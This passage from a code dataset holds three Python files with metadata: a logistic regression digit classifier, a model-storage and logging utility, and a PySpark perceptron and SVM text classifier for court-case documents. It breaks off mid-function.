"file_size_in_byte": 4775, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "warnings.filterwarnings", "line_number": 17, "usage_type": "call"}, {"api_name": "torch.autograd.set_detect_anomaly", "line_number": 25, "usage_type": "call"}, {"api_name": "torch.autograd", "line_number": 25, "usage_type": "attribute"}, {"api_name": 
"gymnasium.vector.make", "line_number": 51, "usage_type": "call"}, {"api_name": "gymnasium.vector", "line_number": 51, "usage_type": "attribute"}, {"api_name": "AttentionModel.AttentionModel", "line_number": 59, "usage_type": "call"}, {"api_name": "AttentionModel.REINFORCE", "line_number": 73, "usage_type": "call"}, {"api_name": "torch.optim", "line_number": 74, "usage_type": "attribute"}, {"api_name": "torch.inf", "line_number": 78, "usage_type": "attribute"}, {"api_name": "tqdm.tqdm", "line_number": 82, "usage_type": "call"}, {"api_name": "sys.stdout", "line_number": 82, "usage_type": "attribute"}, {"api_name": "numpy.stack", "line_number": 90, "usage_type": "call"}, {"api_name": "torch.FloatTensor", "line_number": 91, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 97, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 98, "usage_type": "call"}, {"api_name": "torch.cat", "line_number": 100, "usage_type": "call"}, {"api_name": "torch.zeros", "line_number": 103, "usage_type": "call"}, {"api_name": "numpy.stack", "line_number": 105, "usage_type": "call"}, {"api_name": "torch.tensor", "line_number": 106, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 119, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 121, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 121, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 123, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 130, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.title", "line_number": 131, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 131, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 132, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 132, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 133, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 133, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xticks", "line_number": 134, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 134, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 135, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 135, "usage_type": "name"}]} +{"seq_id": "11881718080", "text": "import numpy as np\r\nimport matplotlib.pyplot as plt\r\nfrom scipy.optimize import minimize\r\nimport scipy.io\r\nfrom numpy.random import default_rng\r\n\r\ndef sigmoid(z):\r\n '''\r\n\r\n Parameters\r\n ----------\r\n z : float or np array\r\n\r\n Returns\r\n -------\r\n g : sigmoid function, evaluated pointwise on the array\r\n\r\n '''\r\n g = np.zeros(z.size)\r\n g = 1/(1+np.exp(-z))\r\n return g\r\n\r\ndef costFunctionReg(theta,X,y,lamb):\r\n '''\r\n \r\n\r\n Parameters\r\n ----------\r\n theta : logistic regression model parameters\r\n X : mxn numpy array containing m training points and a n features\r\n y : size m array containing the responses of the training data\r\n lamb : logistic regression regularization parameter\r\n\r\n Returns\r\n -------\r\n J : the cost function for the regularized logistic regression model\r\n grad : gradient of the regularized logistic regression model\r\n\r\n '''\r\n m = y.shape[0]\r\n J = 0 \r\n grad = np.zeros(theta.shape[0])\r\n h = sigmoid(np.matmul(X,theta))\r\n lambvec = lamb*np.ones(theta.shape[0])\r\n lambvec[0]=0\r\n J = 1/m*(-np.matmul(y,np.log(h))-np.matmul(1-y,np.log(1-h)))+1/(2*m)*np.sum(lambvec*theta**2)\r\n 
grad = 1/m*np.matmul(X.T,h-y)+1/m*lambvec*theta\r\n return (J,grad)\r\n\r\ndef plotmnist(X,m=10,n=10):\r\n\tfig, axs = plt.subplots(m, n)\r\n\tl = max(m,n)\r\n\tif m>=n:\r\n\t\tfor k in range(m*n):\r\n\t\t\taxs[k%l,k//l].imshow(X[k].reshape((20,20)).T,cmap='gray')\r\n\t\t\t#axs[k%l,k//l].set_title(y_train[k+offset])\r\n\t\t\taxs[k%l,k//l].axes.xaxis.set_ticks([])\r\n\t\t\taxs[k%l,k//l].axes.yaxis.set_ticks([])\r\n\telse:\r\n\t\tfor k in range(m*n):\r\n\t\t\taxs[k//l,k%l].imshow(X[k].reshape((20,20)).T,cmap='gray')\r\n\t\t\t#axs[k//l,k%l].set_title(y_train[k+offset])\r\n\t\t\taxs[k//l,k%l].axes.xaxis.set_ticks([])\r\n\t\t\taxs[k//l,k%l].axes.yaxis.set_ticks([])\r\n\tplt.show()\r\n\r\ndef oneVsAll(X,y,num_labels,lamb):\r\n m = X.shape[0]\r\n n = X.shape[1]\r\n \r\n all_theta = np.zeros((num_labels,n))\r\n \r\n for c in range(1,11):\r\n initial_theta = np.zeros(n)\r\n costfunc = lambda theta: costFunctionReg(theta=theta,X=X,y=(y==c),lamb=lamb)[0]\r\n costgrad = lambda theta: costFunctionReg(theta=theta,X=X,y=(y==c),lamb=lamb)[1]\r\n \r\n res = minimize(costfunc, initial_theta, method='BFGS', jac=costgrad,\r\n options={'gtol': 1e-6, 'disp': True})\r\n \r\n all_theta[c-1] = res.x\r\n \r\n return all_theta\r\n \r\n \r\ndef predictOneVsAll(theta,X):\r\n m = X.shape[0]\r\n num_labels = theta.shape[0]\r\n p = np.zeros(X.shape[0])\r\n \r\n p = np.argmax(sigmoid(np.matmul(theta,X.T)),axis=0)+1\r\n return p\r\n\r\ndef main():\r\n input_layer_size = 4000\r\n num_labels = 10\r\n data = scipy.io.loadmat('ex3data1-pythoncompatible.mat')\r\n data = data[\"data\"][0][0]\r\n X = data[0]\r\n y = data[1]\r\n y = y.reshape((y.shape[0],))\r\n rng = default_rng(123)\r\n to_print = rng.integers(5000,size=100)\r\n plotmnist(X=X[to_print])\r\n \r\n X = np.column_stack((np.ones(X.shape[0]),X))\r\n \r\n theta = oneVsAll(X,y,num_labels,0.1)\r\n \r\n predictions = predictOneVsAll(theta,X)\r\n print('Train accuracy: {acc}'.format(acc= np.mean(predictions==y)*100))\r\n\r\nif __name__ == \"__main__\":\r\n main()", "repo_name": "nikolayhristov/Coursera-ML-Python", "sub_path": "Ex3/ex3.py", "file_name": "ex3.py", "file_ext": "py", "file_size_in_byte": 3213, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "numpy.zeros", "line_number": 19, "usage_type": "call"}, {"api_name": "numpy.exp", "line_number": 20, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 42, "usage_type": "call"}, {"api_name": "numpy.matmul", "line_number": 43, "usage_type": "call"}, {"api_name": "numpy.ones", "line_number": 44, "usage_type": "call"}, {"api_name": "numpy.matmul", "line_number": 46, "usage_type": "call"}, {"api_name": "numpy.log", "line_number": 46, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 46, "usage_type": "call"}, {"api_name": "numpy.matmul", "line_number": 47, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.subplots", "line_number": 51, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 51, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 65, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 65, "usage_type": "name"}, {"api_name": "numpy.zeros", "line_number": 71, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 74, "usage_type": "call"}, {"api_name": "scipy.optimize.minimize", "line_number": 78, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 89, "usage_type": "call"}, {"api_name": "numpy.argmax", 
"line_number": 91, "usage_type": "call"}, {"api_name": "numpy.matmul", "line_number": 91, "usage_type": "call"}, {"api_name": "scipy.optimize.io.loadmat", "line_number": 97, "usage_type": "call"}, {"api_name": "scipy.optimize.io", "line_number": 97, "usage_type": "attribute"}, {"api_name": "scipy.optimize", "line_number": 97, "usage_type": "name"}, {"api_name": "numpy.random.default_rng", "line_number": 102, "usage_type": "call"}, {"api_name": "numpy.column_stack", "line_number": 106, "usage_type": "call"}, {"api_name": "numpy.ones", "line_number": 106, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 111, "usage_type": "call"}]} +{"seq_id": "24978114953", "text": "import csv\nimport os\nimport torch\nimport logging\nimport sys\n\nimport utils\nfrom .other import device\n\n\ndef create_folders_if_necessary(path):\n dirname = os.path.dirname(path)\n if not os.path.isdir(dirname):\n os.makedirs(dirname)\n\n\ndef get_storage_dir():\n if \"RL_STORAGE\" in os.environ:\n return os.environ[\"RL_STORAGE\"]\n return \"storage\"\n\n\ndef get_model_dir(model_name):\n return os.path.join(get_storage_dir(), model_name)\n\n\ndef get_status_path(model_dir, i=None):\n if i is None or i == 'NEW':\n mode = i\n unnumbered_path = os.path.join(model_dir, 'status.pt')\n if os.path.exists(unnumbered_path):\n return unnumbered_path\n i = 0\n while os.path.exists(os.path.join(model_dir, 'status_%i.pt'%i)):\n i += 1\n \n if mode is None:\n i -= 1\n \n return os.path.join(model_dir, \"status_%i.pt\"%i)\n\n\ndef get_status(model_dir, i=None):\n path = get_status_path(model_dir, i=i)\n data = torch.load(path, map_location=device)\n print('Loaded status from %s'%path)\n return data\n\n\ndef save_status(status, model_dir, i):\n path = get_status_path(model_dir, i)\n utils.create_folders_if_necessary(path)\n torch.save(status, path)\n\n\ndef get_vocab(model_dir):\n return get_status(model_dir)[\"vocab\"]\n\n\ndef get_model_state(model_dir, i=None):\n return get_status(model_dir, i=i)[\"model_state\"]\n\n\ndef get_txt_logger(model_dir):\n path = os.path.join(model_dir, \"log.txt\")\n utils.create_folders_if_necessary(path)\n\n logging.basicConfig(\n level=logging.INFO,\n format=\"%(message)s\",\n handlers=[\n logging.FileHandler(filename=path),\n logging.StreamHandler(sys.stdout)\n ]\n )\n\n return logging.getLogger()\n\n\ndef get_csv_logger(model_dir):\n csv_path = os.path.join(model_dir, \"log.csv\")\n utils.create_folders_if_necessary(csv_path)\n csv_file = open(csv_path, \"a\")\n return csv_file, csv.writer(csv_file)\n", "repo_name": "aaronwalsman/impossibly-good", "sub_path": "utils/storage.py", "file_name": "storage.py", "file_ext": "py", "file_size_in_byte": 1981, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 3, "dataset": "github-code", "pt": "61", "api": [{"api_name": "os.path.dirname", "line_number": 12, "usage_type": "call"}, {"api_name": "os.path", "line_number": 12, "usage_type": "attribute"}, {"api_name": "os.path.isdir", "line_number": 13, "usage_type": "call"}, {"api_name": "os.path", "line_number": 13, "usage_type": "attribute"}, {"api_name": "os.makedirs", "line_number": 14, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 18, "usage_type": "attribute"}, {"api_name": "os.environ", "line_number": 19, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 24, "usage_type": "call"}, {"api_name": "os.path", "line_number": 24, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 30, "usage_type": "call"}, {"api_name": 
"os.path", "line_number": 30, "usage_type": "attribute"}, {"api_name": "os.path.exists", "line_number": 31, "usage_type": "call"}, {"api_name": "os.path", "line_number": 31, "usage_type": "attribute"}, {"api_name": "os.path.exists", "line_number": 34, "usage_type": "call"}, {"api_name": "os.path", "line_number": 34, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 34, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 40, "usage_type": "call"}, {"api_name": "os.path", "line_number": 40, "usage_type": "attribute"}, {"api_name": "torch.load", "line_number": 45, "usage_type": "call"}, {"api_name": "other.device", "line_number": 45, "usage_type": "name"}, {"api_name": "utils.create_folders_if_necessary", "line_number": 52, "usage_type": "call"}, {"api_name": "torch.save", "line_number": 53, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 65, "usage_type": "call"}, {"api_name": "os.path", "line_number": 65, "usage_type": "attribute"}, {"api_name": "utils.create_folders_if_necessary", "line_number": 66, "usage_type": "call"}, {"api_name": "logging.basicConfig", "line_number": 68, "usage_type": "call"}, {"api_name": "logging.INFO", "line_number": 69, "usage_type": "attribute"}, {"api_name": "logging.FileHandler", "line_number": 72, "usage_type": "call"}, {"api_name": "logging.StreamHandler", "line_number": 73, "usage_type": "call"}, {"api_name": "sys.stdout", "line_number": 73, "usage_type": "attribute"}, {"api_name": "logging.getLogger", "line_number": 77, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 81, "usage_type": "call"}, {"api_name": "os.path", "line_number": 81, "usage_type": "attribute"}, {"api_name": "utils.create_folders_if_necessary", "line_number": 82, "usage_type": "call"}, {"api_name": "csv.writer", "line_number": 84, "usage_type": "call"}]} +{"seq_id": "36646417598", "text": "from __future__ import print_function\nimport sys\nimport re\nfrom operator import add\nimport numpy as np \n\nfrom pyspark import SparkContext\nfrom datetime import datetime\n\nif __name__ == \"__main__\":\n\n\tsc = SparkContext(appName=\"Project-task1\")\n\n\t# Note down the current time for calculation of time\n\tstartingTime = datetime.now()\n\n\t#########################################################################################\n\t#################### 1. Read the training dataset and preprocess it ####################\n\t#########################################################################################\n\n\t# Read the training dataset \n\td_corpus = sc.textFile(sys.argv[1])\n\n\t# Each entry in validLines will be a line from the text file\n\tvalidDocLines = d_corpus.filter(lambda x : 'id' in x and 'url=' in x)\n\n\t# Now, we transform it into a set of (docID, text) pairs\n\tkeyAndText = validDocLines.map(lambda x : (x[x.index('id=\"') + 4 : x.index('\" url=')], x[x.index('\">') + 2:][:-6])) \n\n\t# leveraged the code from assignment 2\n\t# remove all non letter characters\n\tregex = re.compile('[^a-zA-Z]')\n\tkeyAndWordsList = keyAndText.map(lambda x : (str(x[0]), regex.sub(' ', x[1]).lower().split()))\n\n\t# Get the top 20,000 words... 
first change (docID, [\"word1\", \"word2\", \"word3\", ...])\n\t# to (\"word1\", 1) (\"word2\", 1)...\n\tconslidatedWords = keyAndWordsList.flatMap(lambda x: x[1]).map(lambda x: (x,1))\n\n\t# Count all of the words, giving us (\"word1\", 1433), (\"word2\", 3423423), etc.\n\tallCounts = conslidatedWords.reduceByKey(add)\n\n\t# Get the top 20,000 words in a local array in a sorted format based on frequency\n\ttopWordsinDict = allCounts.top(20000, key = lambda x : x[1])\n\n\t# We'll create a RDD that has a set of (word, dictNum) pairs\n\t# start by creating an RDD that has the number 0 through 20000\n\t# 20000 is the number of words that will be in our dictionary\n\ttop20000Words = sc.parallelize(range(20000))\n\n\t# Now, we transform (0), (1), (2), ... to (\"MostCommonWord\", 1)\n\t# (\"NextMostCommon\", 2), ...\n\t# the number will be the spot in the dictionary used to tell us\n\t# where the word is located\n\tdictionary = top20000Words.map (lambda x : (topWordsinDict[x][0], x))\n\n\n\t#########################################################################################\n\t#################### 1.1 FEATURE REDUCTION ####################\n\t#########################################################################################\n\n\t# min-max normalization for converting the regression coefficients to probability range of (0 to 1)\n\n\t# Read the Regression coefficients generated in assignment 4 - task 2\n\t# Leverage the regression coefficients genereated by task2 (model training) to make the prediction\n\t# Open the file containing regression coefficients and read it\n\tfilePathOutputTask2Assignment4 =sc.textFile(sys.argv[2])\n\n\t# Extract out all of the lines present in the output of task 2\n\ttask2Lines = filePathOutputTask2Assignment4.map(lambda x: x.split(\",\"))\n\n\t# Extract the line containing the regression coefficients and remove '[' and ']' from the extremes\n\tlistOfLines = task2Lines.collect()[10]\n\tlistOfLines[0] = listOfLines[0][1:]\n\tlistOfLines[len(listOfLines)-1] = listOfLines[len(listOfLines)-1][:len(listOfLines[len(listOfLines)-1])-2]\n\n\t# Convert the list of regression coefficients to numpy array to be used as an input for using probability vector\n\tregressionCoefficientsGeneratedInAssignment4Task2 = np.array(listOfLines, dtype = np.float64 )\n\n\t# Extract the line containing the weight Initialization coefficients and remove '[' and ']' from the extremes\n\tlistOfLines = task2Lines.collect()[12]\n\tlistOfLines[0] = listOfLines[0][1:]\n\tlistOfLines[len(listOfLines)-1] = listOfLines[len(listOfLines)-1][:len(listOfLines[len(listOfLines)-1])-2]\n\n\t# Convert the list of regression coefficients to numpy array to be used as an input for using probability vector\n\tweightInitializationForPerceptron = np.array(listOfLines, dtype = np.float64 )\n\n\tp = np.zeros(20000)\n\t# max value for a probability is 1\n\t# maxValue = np.ones(20000)\n\tmaxValue = np.amax(regressionCoefficientsGeneratedInAssignment4Task2)\n\n\t# minValue of probability is 0\n\t# minValue = np.zeros(20000)\n\tminValue = np.amin(regressionCoefficientsGeneratedInAssignment4Task2)\n\n\t# min-max normalization formula -> (x-min)/(max-min)\n\tnumerator = np.subtract(regressionCoefficientsGeneratedInAssignment4Task2, minValue)\n\tdenominator = np.subtract(maxValue, minValue)\n\n\tp = np.divide(numerator, denominator)\n\n\t# Select and extract out 10000 features based on the probability. 
Probability is more for word indexes that had larger regression coefficients in Assignment 4 task 2\n\tfeatureSelection = np.random.choice(np.arange(20000), 10000, replace = False)\n\n\n\t# Build new dictionary of 10000 words or features \n\tdictionary = dictionary.filter(lambda x: x[1] in featureSelection).map(lambda x: x[0]).zipWithIndex()\n\n\t# The following function gets a list of dictionaryPos values,\n\t# and then creates a TF vector\n\t# corresponding to those values... for example,\n\t# if we get [3, 4, 1, 1, 2] we would in the\n\t# end have [0, 2/5, 1/5, 1/5, 1/5] because 0 appears zero times,\n\t# 1 appears twice, 2 appears once, etc.\n\n\tdef buildArray(listOfIndices):\n\t \n\t returnVal = np.zeros(10000)\n\t \n\t for index in listOfIndices:\n\t returnVal[index] = returnVal[index] + 1\n\t \n\t mysum = np.sum(returnVal)\n\t \n\t returnVal = np.divide(returnVal, mysum)\n\t \n\t return returnVal\n\t \n\t# Next, we get a RDD that has, for each (docID, [\"word1\", \"word2\", \"word3\", ...]),\n\t# (\"word1\", docID), (\"word2\", docId), ...\n\tallWordsWithDocID = keyAndWordsList.flatMap(lambda x: ((j, x[0]) for j in x[1]))\n\n\t# Now join and link them, to get a set of (\"word1\", (dictionaryPos, docID)) pairs\n\tallDictionaryWords = dictionary.join(allWordsWithDocID)\n\n\t# Now, we drop the actual word itself to get a set of (docID, dictionaryPos) pairs\n\tjustDocAndPos = allDictionaryWords.map(lambda x: (x[1][1],x[1][0]))\n\n\t# Now get a set of (docID, [dictionaryPos1, dictionaryPos2, dictionaryPos3...]) pairs\n\tallDictionaryWordsInEachDoc = justDocAndPos.groupByKey()\n\n\t# The following line this gets us a set of\n\t# (docID, [dictionaryPos1, dictionaryPos2, dictionaryPos3...]) pairs\n\t# and converts the dictionary positions to a bag-of-words numpy array...\n\tallDocsAsNumpyArrays = allDictionaryWordsInEachDoc.map(lambda x: (x[0], buildArray(x[1])))\n\n\t# Now, create a version of allDocsAsNumpyArrays where, in the array,\n\t# every entry is either zero or one.\n\t# A zero means that the word does not occur,\n\t# and a one means that it does.\n\tzeroOrOne = allDocsAsNumpyArrays.map(lambda x: (x[0],np.where(x[1] > 0, 1, 0)))\n\n\t# For SVM\n\t# Function to generate labels for each document - Document with AU id --> 1, else --> 0\n\tdef getLabelSVM(x):\n\t if x[:2] == 'AU':\n\t return 1\n\n\t else:\n\t return -1\n\n\t# For Perceptron\n\t# Function to generate labels for each document - Document with AU id --> 1, else --> 0\n\tdef getLabelPerceptron(x):\n\t if x[:2] == 'AU':\n\t return 1\n\n\t else:\n\t return 0\n\n\n\t# Generate RDD containing - x[0] -> label and x[1] -> 10000 features\n\tyLabelAndXFeaturesPerceptron = zeroOrOne.map(lambda x: (getLabelPerceptron(x[0]),x[1]))\n\ttrainingDataPerceptron = yLabelAndXFeaturesPerceptron\n\n\t# Generate Label and features for SVM containing - x[0] -> label and x[1] -> 10000 features\n\tyLabelAndXFeaturesSVM = zeroOrOne.map(lambda x: (getLabelSVM(x[0]),x[1]))\n\ttrainingDataSVM = yLabelAndXFeaturesSVM\n\n\t# Cache the RDD containing labels and features extracted out of training data for Perceptron\n\ttrainingDataPerceptron.cache()\n\n\t# Cache the RDD containing labels and features extracted out of training data for SVM\n\ttrainingDataSVM.cache()\n\t\n\n\t# Count number of rows\n\tn = float( trainingDataSVM.count())\n\t# End of preprocessing of training data\n\n\t# \n\tTrainingDatasetetPreprocessingCompletionTime = datetime.now()\n\ttimeToReadTrainDataAndPreProcess = TrainingDatasetetPreprocessingCompletionTime - 
startingTime\n\n\t#######################################################################################\n\t#################### 2.1 Train the Perceptron Model ##########################\n\t#######################################################################################\n\n\tprint('\\n',\"### PERCEPTRON MODEL's training started.........\",'\\n')\n\n\t# Initialize the different variables\n\tnumberOfFeatures = 10000\n\tlearningRate = 100\n\tweights = weightInitializationForPerceptron\n\t# weights = np.zeros(numberOfFeatures)\n\t# bias = 0\n\t# bias = 155000\n\tbias = 214200\n\t# bias = 246100\n\tgradients = np.zeros(numberOfFeatures)\n\ttotalNumberOfIterations = 400\n\tcurrentIteration = 0\n\tlistOfTrainingError = []\n\toldTrainingError = float('inf')\n\n\twhile (currentIteration < totalNumberOfIterations):\n\n\t\t# Calculate the linear output using perceptron: RDD contains x[0] -> actual output, x[1] --> Input numpy vector, x[2] --> Calculated linear output\n\t\tlinearOutput = trainingDataPerceptron.map(lambda x: (x[0],x[1], (np.dot(weights, x[1]) + bias )))\n\n\t\t# Find the predicted label using the Unit Step activation funciton\n\n\t\t# Definition of Unit Step Function:\n\t\t# if input >= 0:\n\t\t#\tOutput_label = 1\n\t\t# else:\n\t\t#\tOutput_label = 0 \n\t\tyPredicted = linearOutput.map(lambda x: ( x[0], x[1], np.heaviside(x[2],1)))\n\n\t\t# Get feedback and Calcuate the values that will be used to update weights and bias\n\t\t# Feedback is generated using the error, that is, difference between 'Actual_output' and 'Predicted_output'\n\t\t# Following RDD contains x[1]-> learning Rate * (Actual_Output - Predicted_Output) \n\t\t\n\t\t# Update the weight and bias of perceptron\n\t\tweights += yPredicted.map(lambda x: (1,( x[1] * learningRate*(x[0]-x[2])))).reduceByKey(np.add).collect()[0][1]\n\t\tbias += yPredicted.map(lambda x: (1,(learningRate*(x[0]-x[2])))).reduceByKey(add).collect()[0][1]\n\t\t\n\t\t# Calculate the training error, that is, Number of misclassifications made by perceptron\n\t\ttrainingError = yPredicted.map(lambda x : (1,abs(x[0] - x[2]) )).reduceByKey(add).collect()[0][1]\n\n\n\t\tprint('#'*10, 'Iteration', currentIteration + 1,'#'*10)\n\t\tprint('Weights:', weights )\n\t\tprint('Bias:', bias)\n\t\tprint('l2 Norm of weights vector:',np.linalg.norm(weights))\n\t\tprint('Number of incorrectly classified labels (Training Error):', trainingError,'\\n')\n\n\t\toldTrainingError = trainingError\n\t\tlistOfTrainingError.append(trainingError)\n\n\t\t# Early Stop condition: if the training error becomes 0, stop the training\n\t\tif trainingError == 0:\n\t\t\tprint('Training stopped at iteration', currentIteration + 1)\n\t\t\tbreak\n\n\t\tcurrentIteration += 1\n\t# \n\n\tprint(\"### PERCEPTRON MODEL's training completed..........\",'\\n')\n\n\t# Calculating the time for training the model\n\ttrainingCompletionTimePerceptron = datetime.now()\n\ttrainingTimePerceptron = trainingCompletionTimePerceptron - TrainingDatasetetPreprocessingCompletionTime\n\t\n\n\t#######################################################################################\n\t#################### 2.2 Train the Support Vector Model ##########################\n\t#######################################################################################\n\n\t# Initialize the different variables\n\tnumberOfFeatures = 10000\n\tlearningRate = 0.001\n\tcoefficients = np.zeros(numberOfFeatures)\n\tgradients = np.zeros(numberOfFeatures)\n\ttotalNumberOfIterations = 400\n\tcurrentIteration = 0\n\tlistOfCost = 
[]\n\toldCost = float(\"inf\")\n\tcRegularisationCoefficient = n/10000000000000000\n\tintercept = 0\n\t# oldregressionCoefficients = np.zeros(numberOfFeatures)\n\n\n\n\tprint(\"### SUPPORT VECTOR MACHINE MODEL's training started..........\",'\\n')\n\n\twhile (currentIteration < totalNumberOfIterations):\n\t\t\n\t\t# Update the cost\n\t\tcost = (float(1)/n)*trainingDataSVM.map(lambda x: (1, max(float(0), 1-x[0]*(np.dot(coefficients, x[1])-intercept)))).reduceByKey(np.add).collect()[0][1]\n\t\tcost += (float(1)/float(2)*n*cRegularisationCoefficient)*((np.linalg.norm(coefficients))**2)\n\t\t\n\t\t\n\t\t# Update Gradients\n\t\tgradients = (float(1)/n)*trainingDataSVM.map(lambda x: (1,(0 if (x[0]*(np.dot(coefficients, x[1])-intercept)) >= float(1) else -np.dot(x[0],x[1])))).reduceByKey(np.add).collect()[0][1]\n\t\t\n\t\tgradients += (float(2)/n*cRegularisationCoefficient)*(coefficients)\n\t\t\n\t\t# update intercept\n\t\tinterceptGradient = (float(1)/n)*trainingDataSVM.map(lambda x: (1,(0 if (x[0]*(np.dot(coefficients, x[1])-intercept)) >= float(1) else x[0]))).reduceByKey(np.add).collect()[0][1]\n\t\t\n\n\t\t# Update Parameters\n\t\tcoefficients -= learningRate*gradients\n\t\tintercept -= learningRate*interceptGradient\n\n\t\tprint('#'*10, 'Iteration', currentIteration + 1,'#'*10)\n\t\tprint('Cost:', cost)\n\t\tprint('Intercept:',intercept)\n\t\tprint('Coefficients:', coefficients)\n\t\tprint('Margin:',2/np.linalg.norm(coefficients),'\\n')\n\t\t# BOLD DRIVER\n\t\tif (oldCost > cost):\n\t\t\tlearningRate *= 1.05\n\t\telse:\n\t\t\tlearningRate *= 0.5\n\n\n\n\t\tlistOfCost.append(cost)\n\n\t\t######### Early Stop\n\t\tif oldCost-cost < 0.0001:\n\t\t\tprint('Training stopped at iteration', currentIteration + 1)\n\t\t\tbreak\n\t\t\n\t\toldCost = cost\n\n\t\tcurrentIteration += 1\n\n\t\t# print(cost)\n\n\tprint(\"### SUPPORT VECTOR MACHINE MODEL's training completed..........\",'\\n')\n\n\t# # Calculating the time for training the model\n\ttrainingCompletionTimeSVM = datetime.now()\n\ttrainingTimeSVM = trainingCompletionTimeSVM - trainingCompletionTimePerceptron\n\n\n\n\t#######################################################################################\n\t#################### 3. 
Read the testing dataset and preprocess it ####################\n\t#######################################################################################\n\n\t# Read the dataset \n\ttestData = sc.textFile(sys.argv[3])\n\n\t# Each entry in validLines will be a line from the text file\n\tvalidDocLinesTest = testData.filter(lambda x : 'id' in x and 'url=' in x)\n\n\t# Now, we transform it into a set of (docID, text) pairs\n\tkeyAndTextTest = validDocLinesTest.map(lambda x : (x[x.index('id=\"') + 4 : x.index('\" url=')], x[x.index('\">') + 2:][:-6])) \n\n\t# remove all non letter characters\n\tkeyAndWordsListTest = keyAndTextTest.map(lambda x : (str(x[0]), regex.sub(' ', x[1]).lower().split()))\n\n\t# Get a RDD that has, for each (docID, [\"word1\", \"word2\", \"word3\", ...]),\n\t# (\"word1\", docID), (\"word2\", docId), ...\n\tallWordsWithDocIDTest = keyAndWordsListTest.flatMap(lambda x: ((j, x[0]) for j in x[1]))\n\n\t# Join and link them, to get a set of (\"word1\", (dictionaryPos, docID)) pairs\n\tallDictionaryWordsTest = dictionary.join(allWordsWithDocIDTest)\n\n\t# Drop the actual word itself to get a set of (docID, dictionaryPos) pairs\n\tjustDocAndPosTest = allDictionaryWordsTest.map(lambda x: (x[1][1],x[1][0]))\n\n\t# Get a set of (docID, [dictionaryPos1, dictionaryPos2, dictionaryPos3...]) pairs\n\tallDictionaryWordsInEachDocTest = justDocAndPosTest.groupByKey()\n\n\t# The following line this gets us a set of\n\t# (docID, [dictionaryPos1, dictionaryPos2, dictionaryPos3...]) pairs\n\t# and converts the dictionary positions to a bag-of-words numpy array...\n\tallDocsAsNumpyArraysTest = allDictionaryWordsInEachDocTest.map(lambda x: (x[0], buildArray(x[1])))\n\n\t# Now, create a version of allDocsAsNumpyArrays where, in the array,\n\t# every entry is either zero or one.\n\t# A zero means that the word does not occur,\n\t# and a one means that it does.\n\tzeroOrOneTest = allDocsAsNumpyArraysTest.map(lambda x: (x[0],np.where(x[1] > 0, 1, 0)))\n\n\t# Perceptron\n\t# Create a RDD of testing data and derive features and labels ... x[0]-> label, x[1]-> features\n\tyLabelAndXFeaturesPerceptron = zeroOrOneTest.map(lambda x: (getLabelPerceptron(x[0]),x[1]))\n\ttestingDataPerceptron = yLabelAndXFeaturesPerceptron\n\n\t# SVM\n\t# Create a RDD of testing data and derive features and labels ... 
x[0]-> label, x[1]-> features\n\tyLabelAndXFeaturesSVM = zeroOrOneTest.map(lambda x: (getLabelSVM(x[0]),x[1]))\n\ttestingDataSVM = yLabelAndXFeaturesSVM\n\n\t# Cache the RDD containing labels and features extracted out of testing data\n\t#testingData.cache()\n\n\t# Calculating the time for reading and preprocessing the testing data\n\tTestingDatasetetPreprocessingCompletionTime = datetime.now()\n\ttimeToReadTestDataAndPreProcess = TestingDatasetetPreprocessingCompletionTime - trainingCompletionTimeSVM\n\n\t###################################################################################################\n\t################## 4.1 Predict the labels using the Perceptron Model ####################\n\t###################################################################################################\n\n\n\t# Make the prediction using Perceptron and store results in (x[2]) \n\tyLabelAndXFeaturesPrediction = testingDataPerceptron.map(lambda x: (x[0],x[1],(np.heaviside(np.dot(weights, x[1]) + bias , 1))))\n\n\t# Function to calculate True Positives\n\tdef calculateTruePositives(x):\n\t if (x[0] == 1 and x[2] == 1): # the article was Australian court case (x[0]) and the prediction was also Australian court case x[2]\n\t return 1\n\t else:\n\t return 0\n\n\t# Function to calculate False Positives\n\tdef calculateFalsePositives(x):\n\t if (x[0] == 0 and x[2] == 1): # the article was not Australian court case (x[0]) but the prediction was Australian court case x[2]\n\t return 1\n\t else:\n\t return 0\n\n\t# Function to calculate False Negatives\n\tdef calculateFalseNegatives(x):\n\t if (x[0] == 1 and x[2] == 0): # the article was Australian court case (x[0]) but the prediction was not Australian court case x[2]\n\t return 1\n\t else:\n\t return 0\n\n\t# Function to calculate True Negatives\n\tdef calculateTrueNegatives(x):\n\t if (x[0] 